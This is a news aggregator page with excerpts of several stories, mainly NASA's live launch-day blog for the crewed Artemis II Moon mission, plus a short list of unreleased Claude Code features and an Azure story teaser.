If you’re running production workloads on Azure or relying on it for mission-critical systems, this story matters more than you think.
...
Read the original on isolveproblems.substack.com »
Live launch day updates for NASA’s Artemis II test flight will be published on this page. All times are Eastern.
The Orion spacecraft’s SAWs (solar arrays wings) have fully deployed, completing a key configuration step for the Artemis II mission. Flight controllers in Houston confirmed that all four wings unfolded as planned, locking into place and beginning to draw power.
Each solar array wing extends outward from the European Service Module, giving Orion, named Integrity, a wingspan of roughly 63 feet when fully deployed. Each wing has 15,000 solar cells to convert sunlight to electricity. The arrays can turn on two axes that allow them to rotate and track the Sun, maximizing power generation as the spacecraft changes attitude during its time in Earth orbit and on its outbound journey to the Moon.
The next major milestones are the PRM (perigee raise maneuver) and ARB (apogee raise burn) that will increase the lowest and highest points of the Orion spacecraft’s orbit and prepare the spacecraft for deep‑space operations.
Following the burns, NASA will hold a postlaunch news conference at 9 p.m. from Kennedy Space Center in Florida. Following the news conference, the Artemis II crew will begin preparations for Orion’s proximity operations demonstration. This demonstration will test the ability to manually maneuver Orion relative to another spacecraft, in this case, the interim cryogenic propulsion stage after separation.
Coverage on NASA+ will soon conclude, however 24/7 coverage will continue on NASA’s YouTube channel, and keep following the Artemis blog for live updates of key milestones throughout the mission.
Main engine cutoff of the SLS (Space Launch System) core stage is complete, and the core stage has successfully separated from the interim cryogenic propulsion stage and the Orion spacecraft. This marks the end of the first major propulsion phase of the Artemis II mission and the transition to upper‑stage operations.
The next major milestone is the deployment of the spacecraft’s SAWs (solar array wings) scheduled to begin approximately 18 minutes after launch. Once extended, the four SAWs will provide continuous electrical power to the spacecraft throughout its journey, supporting life‑support systems, avionics, communications, and onboard operations. Deployment is a critical step in configuring Orion for the remainder of its time in Earth orbit and for the outbound trip to the Moon.
The spacecraft adapter jettison fairings that enclose the service module and the launch abort system have separated from the Orion spacecraft. With the rocket and spacecraft now flying above the densest layers of Earth’s atmosphere, Orion no longer requires the protective structures that shielded it during the early, high‑dynamic‑pressure portion of launch.
The next major milestone is core stage separation and Interim Cryogenic Propulsion Stage ignition.
The SLS (Space Launch System) twin solid rocket boosters have separated. The boosters, each standing 177 feet tall and generating more than 3.6 million pounds of thrust at liftoff, provide most of the rocket’s power during the first two minutes of flight and separation reduces mass and allows the core stage to continue propelling the Orion spacecraft, named Integrity, toward orbit.
With the boosters now clear, the SLS core stage remains the primary source of thrust.
In about one minute, the spacecraft adapter jettison fairings that enclose Orion’s service module and the launch abort system will separate from the spacecraft.
6:35 p.m.
NASA’s Artemis II SLS (Space Launch System) rocket, with the Orion spacecraft atop carrying NASA astronauts Reid Wiseman, Victor Glover, and Christina Koch, along with CSA (Canadian Space Agency) astronaut Jeremy Hansen, lifted off from Kennedy Space Center’s Launch Complex 39B in Florida at 6:35 p.m. EDT to begin its journey to deep space.
The twin solid rocket boosters ignited first, delivering more than 75% of the thrust needed to lift the 5.75-million-pound rocket off the pad. Their combined power, along with the four RS-25 engines already at full thrust, generated an incredible 8.8 million pounds of force at liftoff. As the rocket rose, the umbilicals — which provided power, fuel, and data connections during prelaunch — disconnected and retracted into protective housings. This ensured the vehicle is free from ground systems and fully autonomous for flight.
The approximately 10-day Artemis II mission around the Moon is the first crewed flight under NASA’s Artemis campaign. It will help test the systems and hardware needed to continue sending astronauts on increasingly difficult missions to explore more of the Moon for scientific discovery, economic benefits, and to continue building toward the first crewed missions to Mars.
Below are the ascent milestones that will occur leading up to core stage separation. Times may vary by several seconds.
The Artemis II countdown has entered terminal count, and the ground launch sequencer has taken control, orchestrating a precise series of automated commands to prepare the SLS (Space Launch System) rocket and Orion spacecraft for liftoff at a T-0 time of 6:35 p.m. EDT.
The ground launch sequencer ensures that all systems – from propulsion to avionics – transition into flight mode. Key actions performed include pressurizing propellant tanks for optimal engine performance, activating flight software and switching control from ground to onboard systems, and performing final health checks across thousands of sensors to confirm readiness.
This automated sequence minimizes human intervention, reducing risk and ensuring synchronization across complex subsystems. For Artemis II, this moment marks the culmination of years of planning and testing, as the mission moves from ground operations to the threshold of launch.
See the list below of the terminal count milestones:
* T-4M — GLS is go for core stage auxiliary power unit (APU) start
Inside the terminal countdown, teams have a few options to hold the count if needed.
The launch team can hold at 6 minutes for the duration of the launch window, less the 6 minutes needed to launch, without having to recycle back to 10 minutes.
If teams need to stop the clock between T-6 minutes and T-1 minute, 30 seconds, they can hold for up to 3 minutes and resume the clock to launch. If they require more than 3 minutes of hold time, the countdown would recycle back to T-10.
If the clock stops after T-1 minute and 30 seconds, but before the automated launch sequencer takes over, then teams can recycle back to T-10 to try again, provided there is adequate launch window remaining.
After handover to the automated launch sequencer, any issue that would stop the countdown would lead to concluding the launch attempt for that day.
Artemis II Launch Director Charlie Blackwell-Thompson conducted one of the most important steps before liftoff: the “go/no-go” poll for the team to proceed with the final 10 minutes of the countdown known as terminal count.
A unanimous “go” across the board signals that Artemis II is fully prepared to proceed toward launch. This moment represents the culmination of years of planning and hours of meticulous pre-launch work, bringing the mission to the threshold of history.
The launch team has made the decision to extend the T-10 minute hold ahead of today’s launch to give engineers time to work through final preparations for liftoff. There is a two-hour window in which Artemis II could launch, and a new liftoff time will be set shortly
NASA’s Artemis II closeout crew completed its final tasks and departed Launch Complex 39B at NASA’s Kennedy Space Center in Florida. After hours of meticulous work assisting the astronauts with suit-up, hatch closure, and critical spacecraft checks, the team exited the White Room and left the Orion spacecraft sealed and ready for flight.
This departure marks a major transition in launch operations: the spacecraft is now fully configured, and responsibility shifts to the launch control team for the final countdown. The closeout crew’s precision and expertise ensure that every connection, seal, and system is verified before they step away – making this moment a key milestone on the path to liftoff.
Engineers investigated a sensor on the launch abort system’s attitude control motor controller battery that showed a higher temperature than would be expected. It is believed to be an instrumentation issue and will not affect today’s launch.
The weather continues to cooperate and has now been upgraded to 90% go for launch.
Engineers have now resolved an issue with the hardware that communicates with the flight termination system that would have prevented the ground from sending a signal to destruct the rocket if it were to veer off course during ascent, to protect public safety. A confidence test was performed to ensure that the hardware is ready to support today’s launch.
Meanwhile, technicians have completed the launch abort system hatch closure – an essential step that ensures the Orion spacecraft is fully sealed and ready for flight. The hatch provides an additional protective barrier for the crew module, designed to safeguard astronauts during the Artemis II flight path and, if necessary, enable a rapid escape in the event of an emergency.
During this phase, the closeout team verifies hatch alignment, engages locking mechanisms, and confirms pressure integrity. These checks guarantee that the launch abort system hatch can perform its function flawlessly, maintaining structural integrity under extreme launch conditions. With the hatch secured, Orion enters its final configuration for liftoff, marking one of the last major milestones before fueling and launch.
Although the countdown to today’s Artemis II launch is continuing to progress, the Eastern Range has identified an issue that they are currently working to resolve related to their communication with the flight termination system. The flight termination system is a safety system that allows engineers on the ground to send a signal to destruct the rocket if it were to veer off course during ascent, to protect public safety. Without assurance that this system would work if needed, today’s launch would be no-go. However, engineers have devised a way to verify the system and are currently preparing to test this solution.
Technicians began installing the crew module hatch service panel on the Orion spacecraft, an important step in final launch preparations. This panel protects key connections and ensures the hatch area is secure for flight.
As part of current closeout activities, teams are confirming all systems around the hatch are properly sealed and ready for the mission.
With the hatch area secured, teams will continue final checks and countdown operations at Launch Pad 39B at NASA’s Kennedy Space Center in Florida, bringing us closer to sending astronauts on a historic journey around the Moon.
NASA engineers have conducted counterbalance mechanism operations and are now performing hatch seal pressure decay checks inside the White Room at Launch Complex 39B. These steps ensure Orion’s hatch maintains proper pressure integrity and that the counterbalance system functions as designed for launch conditions.
The counterbalance mechanism is a precision-engineered assembly that offsets the weight of the crew module hatch, allowing technicians to open and close it smoothly without introducing stress on the hinge or seal. This system uses calibrated springs and dampers to maintain alignment and prevent sudden movements, which is essential for preserving the hatch’s airtight seal. During this phase, technicians verify the mechanism’s load distribution and confirm that its locking features engage correctly under simulated launch loads.
Following these adjustments, the team performs seal pressurization decay checks – monitoring pressure loss over time to confirm the hatch’s integrity. These checks are vital for astronaut safety, ensuring the cabin remains secure in all mission phases.
NASA’s Artemis II closeout crew is now completing one of the most critical steps before launch: preparing and closing the crew module hatch to the Orion spacecraft. Inside the White Room at Launch Complex 39B, the closeout crew is working meticulously to inspect seals, secure fasteners, and verify that the hatch is airtight.
This process ensures Orion is fully pressurized and ready for flight. Once the hatch is closed and locked, the astronauts are officially sealed inside their spacecraft, marking a major milestone on the path to liftoff.
NASA’s Artemis II crew members are boarding the agency’s Orion spacecraft to begin communication checks to confirm voice links with mission control and onboard systems.
Before entering the spacecraft that will be their home on the approximately 10-day journey around the Moon and back, all four crewmates signed the inside of the White Room, an area at the end of the crew access arm that provides access to the spacecraft. The term “White Room” dates to NASA’s Gemini program, and to honor this human spaceflight tradition, the room remains white today.
The Artemis II closeout crew is now working to help the astronauts enter the Orion spacecraft and make final preparations for their nearly 700,000-mile trip to the Moon and back. As part of the process, the closeout crew is helping the astronauts don their Orion Crew Survival System helmets and gloves, as well as board Orion and get buckled in.
A short time from now, the closeout crew will close the crew module and exterior launch abort system hatches. Even a single strand of hair inside the hatch doors could potentially pose issues with closing either hatch, so the process is carefully done and takes up to four hours. Each step in the closeout process ensures airtight seals and communication readiness for the mission ahead.
Following communication checks, the team performed suit leak checks – a vital safety procedure ensuring each pressure suit maintains integrity in case of cabin depressurization. These operations are essential for crew readiness and mission assurance, marking one of the final phases before hatch closure and launch preparations.
With assistance from the closeout crew, the Artemis II crew are carefully donning their helmets and gloves – finalizing suit integrity checks before boarding the Orion spacecraft.
This step is more than ceremonial; it ensures airtight seals and communication readiness for the mission ahead. The closeout crew plays a vital role, guiding the astronauts through these procedures and confirming every connection is secure before hatch closure.
Stay tuned as we continue to follow the Artemis II team through each countdown milestone on their path to liftoff.
NASA’s Artemis II crew NASA astronauts Reid Wiseman, Victor Glover, and Christina Koch, along with CSA (Canadian Space Agency) astronaut Jeremy Hansen, arrived at Launch Complex 39B at the agency’s Kennedy Space Center in Florida, where the agency’s SLS (Space Launch System) rocket with Orion spacecraft atop stands ready for launch. The opening of today’s launch window is slated for just over 4 hours from now, at 6:24 p.m. EDT.
In the next few minutes, the crew will take the elevator up the pad’s fixed service structure and walk down the climate-controlled crew access arm to the White Room, their final stop before climbing aboard their Orion spacecraft. In this clean, controlled environment at the end of the crew access arm, the closeout crew will assist the astronauts with hatch operations and verify that all safety systems are ready for launch.
Since the late 1960s, pads A and B at Kennedy’s Launch Complex 39 have supported America’s major space programs, with Pad A used most frequently for launches under the Space Shuttle Program. After the retirement of the shuttle in 2011, Pad A helped usher in a new era of human spaceflight as launch pad for the agency’s Commercial Crew Program, which returned human spaceflight capability to the United States. Pad B saw the launch of NASA’s Artemis I mission in November 2022 and will continue to be the primary launch pad for America’s efforts to return to humans the Moon.
Just moments ago, NASA’s Artemis II flight crew began the walk that every NASA astronaut has made since Apollo 7 in 1968, heading to the elevator and down through the double doors below the Neil A. Armstrong Building’s Astronaut Crew Quarters at NASA’s Kennedy Space Center in Florida.
Before they left the suit-up room, the crew completed one last piece of unfinished business — a card game. A long-held spaceflight tradition, NASA crews play cards before leaving the crew quarters ahead of launch until the commander, in this instance NASA astronaut Reid Wiseman, loses. It is hoped that by losing, the commander burns off all his or her bad luck, thereby clearing the mission for only good luck.
NASA’s Artemis II is the first crewed mission of the Artemis program and will carry Wiseman and fellow NASA astronauts Victor Glover and Christina Koch, as well as CSA (Canadian Space Agency) astronaut Jeremy Hansen on an approximately 10-day mission around the Moon and back to Earth.
The first crewed deep-space flight in over 50 years, Artemis II is expected to send the crew farther from Earth than any previous human mission, potentially breaking the record of about 248,655 miles (400,171 km) from Earth set by Apollo 13 during its lunar free-return trajectory. This milestone will occur during the lunar flyby phase, when the crew travels on a free-return trajectory around the Moon, which allows the spacecraft to loop around the Moon and return to Earth without entering lunar orbit.
During the test flight, NASA will test life-support systems and critical operations in deep space, paving the way for future lunar landings and Mars exploration.
Having received goodbyes and well wishes from their families and friends, the crew embarks on the 20-minute journey to Kennedy’s Launch Pad 39B and their awaiting spacecraft.
NASA’s pad rescue and closeout crew teams have arrived at Launch Complex 39B at the agency’s Kennedy Space Center in Florida to ensure safety and readiness during the critical fueling operations. These specialized teams play a vital role in protecting personnel and hardware throughout the countdown.
The pad rescue team will be positioned to respond immediately in the unlikely event of an emergency, ensuring safe evacuation procedures for pad personnel. The rescue team is equipped with advanced gear and trained for rapid crew extraction, fire suppression, and hazard mitigation. Their presence ensures astronaut safety remains the top priority, providing an all-important layer of protection as fueling operations and system checks continue.
The closeout crew is responsible for closing the Orion crew module and launch abort system hatches, securing access points, verifying pad configurations, and maintaining the integrity of the launch area during propellant loading and system checks. Their work is critical for guaranteeing a secure environment for the astronauts before the launch pad is cleared for liftoff operations.
These teams are essential for mitigating risk and supporting the complex choreography of Artemis II’s prelaunch activities. With both teams in place, Artemis II remains on track for its historic mission to send astronauts around the Moon.
NASA astronauts Reid Wiseman, commander; Victor Glover, pilot; and Christina Koch, mission specialist; along with CSA (Canadian Space Agency) astronaut Jeremy Hansen, mission specialist, are suiting up inside the Astronaut Crew Quarters of the Neil A. Armstrong Operations and Checkout Building at the agency’s Kennedy Space Center in Florida.
A team of suit technicians help the crew put on their Orion Crew Survival System suits, which are each tailored for mobility and comfort while ensuring maximum safety during the dynamic phases of flight. The bright orange spacesuits are designed to protect them on their journey and feature many improvements from head to toe to the suits worn on the space shuttle. NASA reengineered many elements to improve safety and range of motion for Artemis astronauts, and instead of the small, medium, and large sizes from the shuttle era, they are custom fit for each crew member.
The outer layer is fire-resistant, and a stronger zipper allows astronauts to quickly put the suit on. Improved thermal management will help keep them cool and dry. A lighter, stronger helmet improves comfort and communication, and the gloves are more durable and touch-screen compatible. Better-fitting boots also provide protection in the case of fire and help an astronaut move more swiftly.
The suits’ design and engineering enhancements provide an additional layer of protection for astronauts and ensure they return home safely from deep space missions.
During suit-up, teams will check for leaks and ensure that all connecting life support systems, including air and power, are operating nominally ahead of the crew’s ride to NASA Kennedy’s Launch Complex 39B.
With NASA teams now maintaining the liquid oxygen levels in the interim cryogenic propulsion, all cryogenic stages of the SLS (Space Launch System) rocket have transitioned to replenish mode during the Artemis II launch countdown. This includes the core stage and SLS upper stage, ensuring both liquid hydrogen and liquid oxygen tanks remain at flight-ready levels.
Replenish mode is essential for maintaining stable propellant quantities and pressure as super-cold fuels naturally boil off over time. Continuous adjustments keep the rocket fully fueled and ready for ignition, supporting the RS-25 engines on the core stage and the RL10 engine on the SLS upper stage for their essential roles in launch and translunar injection.
These milestones coincide with the Artemis II countdown entering a planned 1-hour and 10-minute built-in hold. This scheduled pause allows teams to complete crucial system checks, verify launch readiness, and address any last-minute adjustments before proceeding toward crew ingress and final fueling operations.
During this hold, engineers review data from cryogenic loading, propulsion systems, and communications to ensure all parameters meet strict safety and performance criteria. The hold also provides flexibility for resolving minor issues without impacting the overall launch timeline.
Once the hold concludes, the countdown will resume with preparations for astronaut arrival at Launch Pad 39B at NASA’s Kennedy Space Center in Florida.
NASA’s Artemis II astronauts received a final weather briefing inside the Astronaut Crew Quarters of the Neil A. Armstrong Operations and Checkout Building at the agency’s Kennedy Space Center in Florida, as part of prelaunch preparations.
This weather update provides astronauts and mission teams with the latest conditions at NASA Kennedy’s Launch Pad 39B, the surrounding recovery zones, and potential abort sites along Artemis II’s flight path. Accurate weather forecasting is essential for protecting crew and hardware, as even minor changes can impact countdown decisions and flight dynamics.
NASA astronauts Reid Wiseman, commander; Victor Glover, pilot; and Christina Koch, mission specialist; along with CSA (Canadian Space Agency) astronaut Jeremy Hansen, mission specialist, were briefed on wind speeds, precipitation, lightning risk, and sea states for splashdown contingencies, ensuring all safety criteria are met before proceeding with launch operations.
Weather officials with NASA and the U. S. Space Force’s Space Launch Delta 45 are tracking 80% favorable conditions during the launch window, with primary concerns being the cumulus cloud rule, flight through precipitation rule, and ground winds.
With the weather briefing complete, the crew and ground teams remain aligned and ready to continue toward liftoff, keeping Artemis II on track for its historic mission to send astronauts around the Moon.
NASA teams also have begun liquid oxygen (LOX) topping process for the interim cryogenic propulsion stage, or SLS (Space Launch System) rocket upper stage, during the Artemis II launch countdown. This step follows the fast fill phase and ensures the liquid oxygen tank reaches full capacity with super-cold oxidizer.
Live coverage of Artemis II tanking operations continues on NASA’s YouTube channel. NASA’s full launch coverage begins at 1 p.m. EDT on NASA+, Amazon Prime, and YouTube. You can continue to follow the Artemis blog from launch to splashdown for mission updates.
Liquid oxygen (LOX) fast fill is now complete for the SLS (Space Launch System) upper stage, marking another major milestone in tanking operations. Teams have confirmed the upper stage is in good shape and are proceeding with the LOX vent and relief test. This step helps verify proper pressure regulation and ensures the system is ready to transition into topping and, later, replenish operations.
NASA teams are now maintaining the liquid oxygen levels in the SLS (Space Launch System) rocket core stage through replenish mode. This phase follows the completion of liquid oxygen fast fill and topping, ensuring the oxidizer remains at flight-ready levels throughout the final countdown.
NASA teams are in fast fill of liquid oxygen (LOX) into the interim cryogenic propulsion stage as part of the Artemis II launch countdown. This phase rapidly loads the oxidizer after chilldown is complete, bringing the SLS (Space Launch System) rocket upper stage closer to full readiness for its role in sending the Orion spacecraft into a high Earth orbit ahead of a proximity operations demonstration test and Orion’s translunar injection burn.
NASA teams have transitioned the interim cryogenic propulsion stage liquid hydrogen tank to replenish mode during the Artemis II countdown. This phase follows the successful topping process and ensures the tank remains at flight-ready levels all the way to launch.
NASA teams have begun the topping phase for the interim cryogenic propulsion stage liquid hydrogen (LH2) tank. This critical step occurs after successful chilldown and vent-and-relief checks, ensuring the tank reaches full capacity with super-cold liquid hydrogen.
Replenish is the final step in the fueling process, designed to maintain the correct LH2 levels as the super-cold propellant naturally boils off over time. This continuous, low-rate flow keeps the tanks topped off and thermally stable, ensuring the rocket remains fully fueled and ready for liftoff.
From chilldown to replenish, every phase of fueling is carefully managed to protect hardware and guarantee mission success. With replenish underway, Artemis II is in its final stretch toward launch and humanity’s next giant leap.
Topping is the process of adding small amounts of LH2 to the tanks after fast fill is complete, ensuring they remain at full capacity as the super-cold propellant naturally boils off. This step is critical for maintaining the precise levels needed for launch while keeping the system thermally stable.
The Artemis II launch team transitioned to the fast fill of liquid hydrogen (LH2) for the interim cryogenic propulsion stage, or SLS (Space Launch System) rocket upper stage.
After completing the chilldown phase, this step rapidly loads super-cold LH2 into the SLS upper stage tanks, ensuring the upper stage is fueled and ready to perform its fundamental role of raising the Orion spacecraft into a high Earth orbit ahead of a proximity operations demonstration test and Orion’s translunar injection burn.
Fast fill accelerates the fueling process while maintaining safety, marking another major milestone in the countdown as Artemis II moves closer to liftoff.
The Artemis II launch team has begun the liquid hydrogen chilldown for the interim cryogenic propulsion stage, or SLS (Space Launch System) rocket upper stage.
This process gradually cools the interim cryogenic propulsion stage fuel lines and components to cryogenic temperatures using super-cold liquid hydrogen. The chilldown step is essential to prevent thermal shock and ensure the stage is properly conditioned for full propellant loading. By stabilizing the system at these extreme temperatures, engineers guarantee safe and efficient fueling for the upper stage that will help position Orion into high Earth orbit for its journey toward the Moon.
NASA astronauts Reid Wiseman, Victor Glover, and Christina Koch, along with CSA (Canadian Space Agency) astronaut Jeremy Hansen have officially begun their launch day with a scheduled wake-up call at 9:25 a.m., marking the start of their final preparations for the historic Artemis II mission around the Moon.
The Artemis II launch team transitioned to the fast fill of liquid hydrogen (LH2) into the SLS (Space Launch System) rocket core stage.
...
Read the original on www.nasa.gov »
Stuff that’s in the code but not shipped yet. Feature-flagged, env-gated, or just commented out.
A virtual pet that lives in your terminal. Species and rarity are derived from your account ID. Persistent mode with memory consolidation between sessions and autonomous background actions.Long planning sessions on Opus-class models, up to 30-minute execution windows.Control Claude Code from your phone or a browser. Full remote session with permission approvals.Run sessions in the background with –bgtmuxSessions talk to each other over Unix domain sockets.Between sessions, the AI reviews what happened and organizes what it learned.
...
Read the original on ccunpacked.dev »
Artemis II is NASA’s first crewed mission under the Artemis program and will launch from the agency’s Kennedy Space Center in Florida. It will send NASA astronauts Reid Wiseman, Victor Glover, Christina Koch, and CSA (Canadian Space Agency) astronaut Jeremy Hansen on an approximately 10-day journey around the Moon. Among objectives, the agency will test the Orion spacecraft’s life support systems for the first time with people and lay the groundwork for future crewed Artemis missions.
...
Read the original on plus.nasa.gov »
To add this web app to your iOS home screen tap the share button and select "Add to the Home Screen".
10HN is also available as an iOS App
If you visit 10HN only rarely, check out the the best articles from the past week.
If you like 10HN please leave feedback and share
Visit pancik.com for more.